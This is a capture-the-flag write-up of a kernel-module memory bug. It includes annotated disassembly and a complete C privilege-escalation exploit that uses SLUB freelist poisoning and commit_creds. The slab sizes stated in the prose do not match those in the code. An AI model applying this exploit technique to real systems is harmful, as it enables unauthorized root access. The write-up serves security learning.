26
Apr
2013

pCTF 2013 – servr (web 400)

The challenge description is:

We got a shell on this crazy guy’s web server, but he’s running some really weird software πŸ™ Help me get higher privileges please?

As it turns out, this guy is really crazy, since his web server is implemented as a kernel module, and this “web” challenge is actually a kernel pwning challenge.

If we log in there is a file servr.ko in the home directory. That file extension usually indicates a kernel module, and indeed if we run lsmod we can see that a kernel module named servr is loaded.

Trying to access the server sometimes gives a valid HTTP response which just contains the data the user sent in a POST request, but sometimes the kernel just crashes instead. It is clear that there is some memory corruption going on here, so it’s time to spend some time reversing the binary to see if we can understand the bug.

I first tried using objdump for this, which is really suboptimal since all of the references to external functions and even some of the internal crossreferences are not recognized. This is because they are stored as relocation entries, which are apparently in some format which is not recognized by the objdump disassembler. After writing some scripts to produce a decent disassembly with proper annotations the view is much clearer, but there is still quite a bit of code to go through. Most of this code does not really appear to be relevant to the challenge, such as the storing of HTTP header keys and values in a doubly-linked list (looks like struct list_head, which is used a lot in the kernel).

As it turns out the bug happens all the way at the end of the request handling cycle, when a response is built and sent to the client. This code basically prepends the data received from the client with a fixed HTTP header and sends the whole thing off to the client as a response. The problem is that the buffer has the size of the received data, and does not take the HTTP header’s size in account. So the allocated buffer is always overflowed by 0x40 bytes of user-controlled data.

Disassembly with basic comments (not cleaned up, sorry):

0000000000000580 <finish_handle_request>:
 580:	55                   	push   rbp
 581:	48 89 e5             	mov    rbp,rsp
 584:	53                   	push   rbx
 585:	48 89 fb             	mov    rbx,rdi
 588:	48 83 ec 08          	sub    rsp,0x8
 58c:	c7 47 28 02 00 00 00 	mov    DWORD PTR [rdi+0x28],0x2
 593:	48 8b 7f 70          	mov    rdi,QWORD PTR [rdi+0x70] ; len
 597:	48 85 ff             	test   rdi,rdi
 59a:	0f 84 c0 00 00 00    	je     660 <finish_handle_request+0xe0>
 5a0:	48 89 bb 80 00 00 00 	mov    QWORD PTR [rbx+0x80],rdi
 5a7:	be d0 80 00 00       	mov    esi,0x80d0 ; flags
 5ac:	e8 00 00 00 00       	call   5b1 <finish_handle_request+0x31> ; kmalloc
 5b1:	48 85 c0             	test   rax,rax
 5b4:	48 89 43 78          	mov    QWORD PTR [rbx+0x78],rax ; mydata?->dataofs
 5b8:	0f 84 a2 00 00 00    	je     660 <finish_handle_request+0xe0> ; skip_buffer_building
 5be:	49 b8 20 32 30 30 20 	movabs r8,0xd4b4f2030303220
 5c5:	4f 4b 0d 
 5c8:	49 b9 0a 53 65 72 76 	movabs r9,0x3a7265767265530a
 5cf:	65 72 3a 
 5d2:	49 ba 20 73 65 72 76 	movabs r10,0x312f727672657320
 5d9:	72 2f 31 
 5dc:	49 bb 2e 30 0d 0a 43 	movabs r11,0x746e6f430a0d302e
 5e3:	6f 6e 74 
 5e6:	48 b9 3a 20 74 65 78 	movabs rcx,0x702f74786574203a
 5ed:	74 2f 70 
 5f0:	48 bf 48 54 54 50 2f 	movabs rdi,0x312e312f50545448
 5f7:	31 2e 31 
 5fa:	48 ba 65 6e 74 2d 74 	movabs rdx,0x657079742d746e65
 601:	79 70 65 
 604:	48 be 6c 61 69 6e 0d 	movabs rsi,0xa0d0a0d6e69616c
 60b:	0a 0d 0a 
 60e:	c6 83 90 00 00 00 01 	mov    BYTE PTR [rbx+0x90],0x1
 615:	4c 89 40 08          	mov    QWORD PTR [rax+0x8],r8
 619:	4c 89 48 10          	mov    QWORD PTR [rax+0x10],r9
 61d:	4c 89 50 18          	mov    QWORD PTR [rax+0x18],r10
 621:	4c 89 58 20          	mov    QWORD PTR [rax+0x20],r11
 625:	48 89 48 30          	mov    QWORD PTR [rax+0x30],rcx
 629:	48 89 38             	mov    QWORD PTR [rax],rdi
 62c:	48 89 50 28          	mov    QWORD PTR [rax+0x28],rdx
 630:	48 89 70 38          	mov    QWORD PTR [rax+0x38],rsi
 634:	c6 40 40 00          	mov    BYTE PTR [rax+0x40],0x0
 638:	48 8b 7b 78          	mov    rdi,QWORD PTR [rbx+0x78] ; dest (+0x40 later)
 63c:	48 8b 73 68          	mov    rsi,QWORD PTR [rbx+0x68] ; src
 640:	48 8b 53 70          	mov    rdx,QWORD PTR [rbx+0x70] ; count (content length)
 644:	48 83 c7 40          	add    rdi,0x40
 648:	e8 00 00 00 00       	call   64d <finish_handle_request+0xcd> ; memcpy
 64d:	48 89 df             	mov    rdi,rbx
 650:	e8 5b fe ff ff       	call   4b0 <client_handle_send> ; *(rbx+0x80) == *(rbx+0x70) == len, rbx+0x78 is buf
 655:	48 83 c4 08          	add    rsp,0x8
 659:	5b                   	pop    rbx
 65a:	5d                   	pop    rbp
 65b:	c3                   	ret    

The big block of movabs instructions is moving the static response string into the start of the newly allocated buffer, which was allocated using kmalloc. You can clearly see content-length bytes of data being copied into the buffer at offset 0x40, when the buffer was allocated as content-length bytes.

So now we have an overflow, but what is actually being overwritten here?

We have to discuss a little bit how memory allocations happen in the kernel. As you can see memory is allocated using kmalloc. Kmalloc will use a memory allocator to actually perform the allocation. The current default memory allocator in the Linux kernel is the SLUB allocator. This allocator allocates memory in large chunks (multiples of 4096) and splits these into allocations of a fixed size for each chunk. The free allocations are kept in a linked list, from which they are removed when allocated and they are added back in when they are freed. You can view the various categories on your own system by typing “cat /proc/slabinfo” and looking at the entries that start with “vmalloc”. This file is only readable by root, however, so you cannot read it on the actual server.

For this reason it is a good idea to start the downloadable VM locally, extract the initramfs using gunzip and cpio, alter the init script to spawn a rootshell instead of a user-level shell, reencode the initramfs image, and boot the vm to a rootshell. You can now debug your exploit with root privileges.

Now we can exploit an overflow in two different ways:

  • We can overflow into metadata used by the SLUB allocator, or
  • We can overflow into an adjacent allocated object

The second method is a bit tricky, since we need to know the type of object that was allocated next to ours. There are ways to guarantee this pretty easily on a system with so little going on (no other services and such), but there was a hint that overwriting the free pointer is very easy on SLUB. So, we go for the first option.

As mentioned before, free allocations are in a linked list, so they start with a pointer to the next free allocation. So if the first 8 bytes (remember this is a 64-bit system, so pointers are 64 bits long) point to some userspace address, at some point a kmalloc will return the next pointer from the free list in that size category and return a pointer to userspace. At that point some kind of kernel data will be in a userspace buffer that we can freely modify and inspect, which is an extremely powerful technique. The hint mentions a file object, so let’s go with that.

A file object is a ‘struct file’ in the C source code of the kernel, and you can find its definition in include/linux/fs.h:

struct file {
        /*
         * fu_list becomes invalid after file_free is called and queued via
         * fu_rcuhead for RCU freeing
         */
        union {
                struct list_head        fu_list;
                struct rcu_head         fu_rcuhead;
        } f_u;
        struct path             f_path;
#define f_dentry        f_path.dentry
        struct inode            *f_inode;       /* cached value */
        const struct file_operations    *f_op;

// ....

}

It’s quite a large structure, so I removed a lot of less interesting lines from the end.

If we want this structure to be allocated in our userspace memory buffer then we have to make sure the allocation that we overflow is in the same size category as the ‘struct file’ structure. You can easily determine the category by taking a copy of the contents of /proc/slabinfo, opening a few hundred files, and then looking at /proc/slabinfo again and checking which slab has seen a spike in the number of allocations. As it turns out, this is slab vmalloc-192, so the size of our allocation has to be below 192 bytes but above the next lowest size category.

That means our request body should be 192-0x40 = 128 bytes, of which the last 0x40 will overflow. therefore, we should have something like this:

exploit = "A" * (128-0x40) + struct.pack("Q", ptr) + "A" * (0x40 - 8)

However, we will make exploit in C, because it needs to run on the system itself. This is because when we trigger an allocation at our chosen userspace address, the current process has to be our exploit process, since the pointer is unlikely to be valid in other processes (and in any case we cannot manipulate the data if it is in another process).

To start with we will make a simple program that consumes all current empty allocations of the right size, performs the overflow, then creates a bunch of files, and then dumps the contents of our userspace memory buffer to verify that some kind of kernel object now lives there.

#include <unistd.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/types.h> 
#include <sys/socket.h>
#include <netinet/in.h>
#include <string.h>
#include <fcntl.h>
#include <errno.h>
                                                        
void err(char * msg) {
    write(1,msg,strlen(msg));
    char nl = '\n';
    write(1,&nl, 1);
    exit(errno);
}

// memory area where the kernel will allocate a struct file
char myfile[4096];

// misc buffer
char buffer[4096];

char * hexchars = "0123456789abcdef";


int main(int argc, char *argv[])
{
    int sockfd, fd;
    int n, i;
    struct sockaddr_in serv_addr = {
        .sin_addr = { .s_addr = htonl(INADDR_LOOPBACK) },
        .sin_family = AF_INET,
        .sin_port = htons(80),
    };

    memset(myfile, 0, sizeof(myfile));

    // open lots of files to take up any unused slab entries
	// (needed to ensure an empty allocation will follow the one for 
	// our response page)

    for (i = 0; i < 100; i++) if (open("/etc/passwd", O_RDONLY) < 0) err("open lots 1");

	// create request that will overflow a 256-byte heap allocation by 8 bytes 
	// (which is the size of a pointer). those 8 bytes contain a pointer to 
	// myfile, which will be used as the spo where the next heap allocation
	// from the 256-byte slab will be allocated.

    strcpy(buffer, "POST / HTTP/1.1\r\nContent-Length: 200\r\n\r\n"); // 200 = 256 - 0x40 + 8
    for (i = 0; i < 200 - 8; i++)
        strcat(buffer, "A");
    i = strlen(buffer);
    *((void**) (buffer + i)) = myfile;
    i += sizeof(void**);

	// send the trigger to the server and read all the response data

    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    if (sockfd < 0) err("socket");

    if (connect(sockfd, (struct sockaddr *) &serv_addr, sizeof(serv_addr)) < 0) err("connect");

    n = write(sockfd, buffer, i);
    if (n < 0) err("write");
    if (n != i) err("short write");

    while (read(sockfd, buffer, sizeof(buffer)) > 0) {}

    close(sockfd);

    sleep(1);

    int fds[100];
    
    // open a bunch of files
	// if the defragmentation worked 100%, the first one should land
	// in 'myfile'. otherwise one of the later ones will be it.
    for (i = 0; i < 100; i++) if ((fds[i] = open("/etc/passwd", O_RDONLY)) < 0) err("open lots 2");

	// hex dump the myfile area to show that the kernel did indeed put
	// a struct file there
    for (i = 0; i < sizeof(myfile); i++) {
        buffer[0] = hexchars[((unsigned char) myfile[i]) >> 4];
        buffer[1] = hexchars[((unsigned char) myfile[i]) & 0xf];
        buffer[2] = (i & 0xf) == 0xf ? '\n' : ' ';
        write(1, buffer, 3);
    }

    buffer[0] = '\n';
    write(1, buffer, 1);

	// don't exit. the kernel now thinks myfile is a part of the 
	// vmalloc-256 slab, which will be bad when this program exits.
	// could be fixed up but I can't be bothered.
    while (1) sleep(1);

    return 0;
}

To make it easier to compile this program and ship it to the server, we compile it with kcc, an ubuntu package which contains a gcc script that builds a binary statically against klibc, a minimal libc. This yields a very small binary that can be easily gzip’ed, base64 encoded, and then pasted to the server.

When you run this you will see that the buffer that we cleared now magically contains a whole bunch of data, which is actually a struct file placed there by the kernel.

Now, to manipulate this object to obtain code execution. Remember the “struct file” layout given above. There is a f_op member which points to a “struct file_operations” structure. This structure contains a whole lot of function pointers that implement various operations that can be performed on this file object:

struct file_operations {
        struct module *owner;
        loff_t (*llseek) (struct file *, loff_t, int);
        ssize_t (*read) (struct file *, char __user *, size_t, loff_t *);
        ssize_t (*write) (struct file *, const char __user *, size_t, loff_t *);
        ssize_t (*aio_read) (struct kiocb *, const struct iovec *, unsigned long, loff_t);
        ssize_t (*aio_write) (struct kiocb *, const struct iovec *, unsigned long, loff_t);
        int (*readdir) (struct file *, void *, filldir_t);
        unsigned int (*poll) (struct file *, struct poll_table_struct *);

// ....

}

Again, it’s quite a large struct. But we’ll use the llseek function, simply because it is the first function pointer and we don’t have to convert the whole structure definition to something that will compile without all the kernel’s type definitions.

Here are out much abbreviated definitions of the struct file and struct file_operations:

// fake struct file_operations
struct kern_fop {
    void *owner;
    ssize_t (*llseek) (void *, ssize_t, int);
	char misc[1024]; 
};

// fake struct file
struct kern_file {
    void * fu_list[2];
    void * path[2];
    struct kern_fop *fop;
};

As you can see there’s barely anything there, the only important thing is that the fop and llseek members match the positions of the corresponding members in the real structure definitions.

Now we expand our previous program to replace the f_op pointer in our struct file with a pointer to our own version, which is mostly empty except for a pointer to our own implementation of the llseek callback for the file object. Since our llseek callback will be invoked in kernel mode, it will have full access to the kernel’s address space, including all kernel functions and data. So we can just call some kernel function that gives the current process full root permissions, and then return as if nothing happened.

The classic way to do this is to call two kernel functions as follows:

commit_creds(prepare_kernel_cred(0));

This sets the permissions of the current process to the same permissions used for the kernel’s own processes, which equates to root permissions.

We can find the location of the necessary kernel functions using /proc/kallsyms:

$ grep prepare_kernel_cred /proc/kallsyms
ffffffff81063510 T prepare_kernel_cred
$ grep commit_creds /proc/kallsyms
ffffffff81063250 T commit_creds

So our implementation of llseek becomes:


// taken from /proc/kallsyms:
// ffffffff81063250 T commit_creds
// ffffffff81063510 T prepare_kernel_cred

void * (*prepare_kernel_cred)(int) = (void*) 0xffffffff81063510ul;
void (*commit_creds)(void *) = (void*) 0xffffffff81063250ul;

int code_executed = 0;

// called in kernel mode
ssize_t my_llseek(void * a, ssize_t b, int c) {

	// tell the main program we got called by the kernel
    code_executed = 1;

	// restore the (struct file)->f_op pointer for safety
    fakefile->fop = (struct kern_fop *) orig_fop;

	// grab ALL the permissions
    commit_creds(prepare_kernel_cred(0));

    return 0;
}

Note the two functions pointers. Also, we set a global variable once the kernel mode code has been called, so we can detect this later. Calling printf or other C library functions from kernel mode is not advisable, so we can’t just write a message.

And just to be sure we replace the f_op pointer with the original value after our code was called, just to make sure that if the kernel tries to call any other function after our llseek is called it will not crash (as long as our process is the current process, that is).

We could do a bunch of stuff to clean up nicely after ourselves, but there’s really not much point. So we just add some code to read the key file and then enter an infinite loop, to try and prevent the kernel from crashing in the most stupid way possible.

The full exploit is a bit dirty, but it does the job and prints the flag file:

#include <unistd.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/types.h> 
#include <sys/socket.h>
#include <netinet/in.h>
#include <string.h>
#include <fcntl.h>
#include <errno.h>

// fake struct file_operations
struct kern_fop {
    void *owner;
    ssize_t (*llseek) (void *, ssize_t, int);
	char misc[1024]; 
};

// fake struct file
struct kern_file {
    void * fu_list[2];
    void * path[2];
    struct kern_fop *fop;
};
                                                        
void err(char * msg) {
    write(1,msg,strlen(msg));
    char nl = '\n';
    write(1,&nl, 1);
    exit(errno);
}

// memory area where the kernel will allocate a struct file
char myfile[4096];

// misc buffer
char buffer[4096];

void * orig_fop;

ssize_t my_llseek(void *, ssize_t, int);

struct kern_file * fakefile = (void*) &myfile;
struct kern_fop fakefop = {
    .llseek = my_llseek,
};


char * hexchars = "0123456789abcdef";

// taken from /proc/kallsyms:
// ffffffff81063250 T commit_creds
// ffffffff81063510 T prepare_kernel_cred

void * (*prepare_kernel_cred)(int) = (void*) 0xffffffff81063510ul;
void (*commit_creds)(void *) = (void*) 0xffffffff81063250ul;

int code_executed = 0;

// called in kernel mode
ssize_t my_llseek(void * a, ssize_t b, int c) {

	// tell the main program we got called by the kernel
    code_executed = 1;

	// restore the (struct file)->f_op pointer for safety
    fakefile->fop = (struct kern_fop *) orig_fop;

	// grab ALL the permissions
    commit_creds(prepare_kernel_cred(0));

    return 0;
}


int main(int argc, char *argv[])
{
    int sockfd, fd;
    int n, i;
    struct sockaddr_in serv_addr = {
        .sin_addr = { .s_addr = htonl(INADDR_LOOPBACK) },
        .sin_family = AF_INET,
        .sin_port = htons(80),
    };

    memset(myfile, 0, sizeof(myfile));

    // open lots of files to take up any unused slab entries
	// (needed to ensure an empty allocation will follow the one for 
	// our response page)

    for (i = 0; i < 100; i++) if (open("/etc/passwd", O_RDONLY) < 0) err("open lots 1");

	// create request that will overflow a 256-byte heap allocation by 8 bytes 
	// (which is the size of a pointer). those 8 bytes contain a pointer to 
	// myfile, which will be used as the spo where the next heap allocation
	// from the 256-byte slab will be allocated.

    strcpy(buffer, "POST / HTTP/1.1\r\nContent-Length: 200\r\n\r\n"); // 200 = 256 - 0x40 + 8
    for (i = 0; i < 200 - 8; i++)
        strcat(buffer, "A");
    i = strlen(buffer);
    *((void**) (buffer + i)) = myfile;
    i += sizeof(void**);

	// send the trigger to the server and read all the response data

    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    if (sockfd < 0) err("socket");

    if (connect(sockfd, (struct sockaddr *) &serv_addr, sizeof(serv_addr)) < 0) err("connect");

    n = write(sockfd, buffer, i);
    if (n < 0) err("write");
    if (n != i) err("short write");

    while (read(sockfd, buffer, sizeof(buffer)) > 0) {}

    close(sockfd);

    sleep(1);

    int fds[100];
    
    // open a bunch of files
	// if the defragmentation worked 100%, the first one should land
	// in 'myfile'. otherwise one of the later ones will be it.
    for (i = 0; i < 100; i++) if ((fds[i] = open("/etc/passwd", O_RDONLY)) < 0) err("open lots 2");

	// hex dump the myfile area to show that the kernel did indeed put
	// a struct file there
    for (i = 0; i < sizeof(myfile); i++) {
        buffer[0] = hexchars[((unsigned char) myfile[i]) >> 4];
        buffer[1] = hexchars[((unsigned char) myfile[i]) & 0xf];
        buffer[2] = (i & 0xf) == 0xf ? '\n' : ' ';
        write(1, buffer, 3);
    }

    buffer[0] = '\n';
    write(1, buffer, 1);
    
	// save the original (struct file)->f_op ptr, and then overwrite it 
	// with a pointer to our fake struct. this fake struct will redirect
	// llseek operations to my_llseek.
    orig_fop = fakefile->fop;
    fakefile->fop = &fakefop;

	// wait a while (not sure anymore why)
    sleep(1);

	// trigger our llseek call
    loff_t res;
    for (i = 0; i < 100; i++) llseek(fds[i], 0, SEEK_END);
    
	// my_llseek should have set our uid to 0 and code_executed=1
    if (code_executed && getuid() == 0) {
        write(1, "WIN\n", 4);

		// open flag file, read it, and write to stdout.
		// could also spawn a shell, but better keep it simple.
        fds[0] = open("/root/flag", O_RDONLY);
        if (fds[0] < 0) err("open flag");
        i = read(fds[0], buffer, sizeof(buffer));
        if (i <= 0) err("read flag");
        if (write(1, buffer, i) != i) err("out flag");
      
    } else {
        write(1, "FAIL\n", 5);
    }

	// don't exit. the kernel now thinks myfile is a part of the 
	// vmalloc-256 slab, which will be bad when this program exits.
	// could be fixed up but I can't be bothered.
    while (1) sleep(1);

    return 0;
}

{3 Responses to “pCTF 2013 – servr (web 400)”}

  1. Awesome job guys!!! Thanks for sharing!

    Danux
  2. Hi, could you please share details about kcc compilation process? is kcc available? if not, what other options we have to compile/port the code to qemu?

    Dan
  3. Huh, it was a typo, you meant klcc not kcc.

    Hey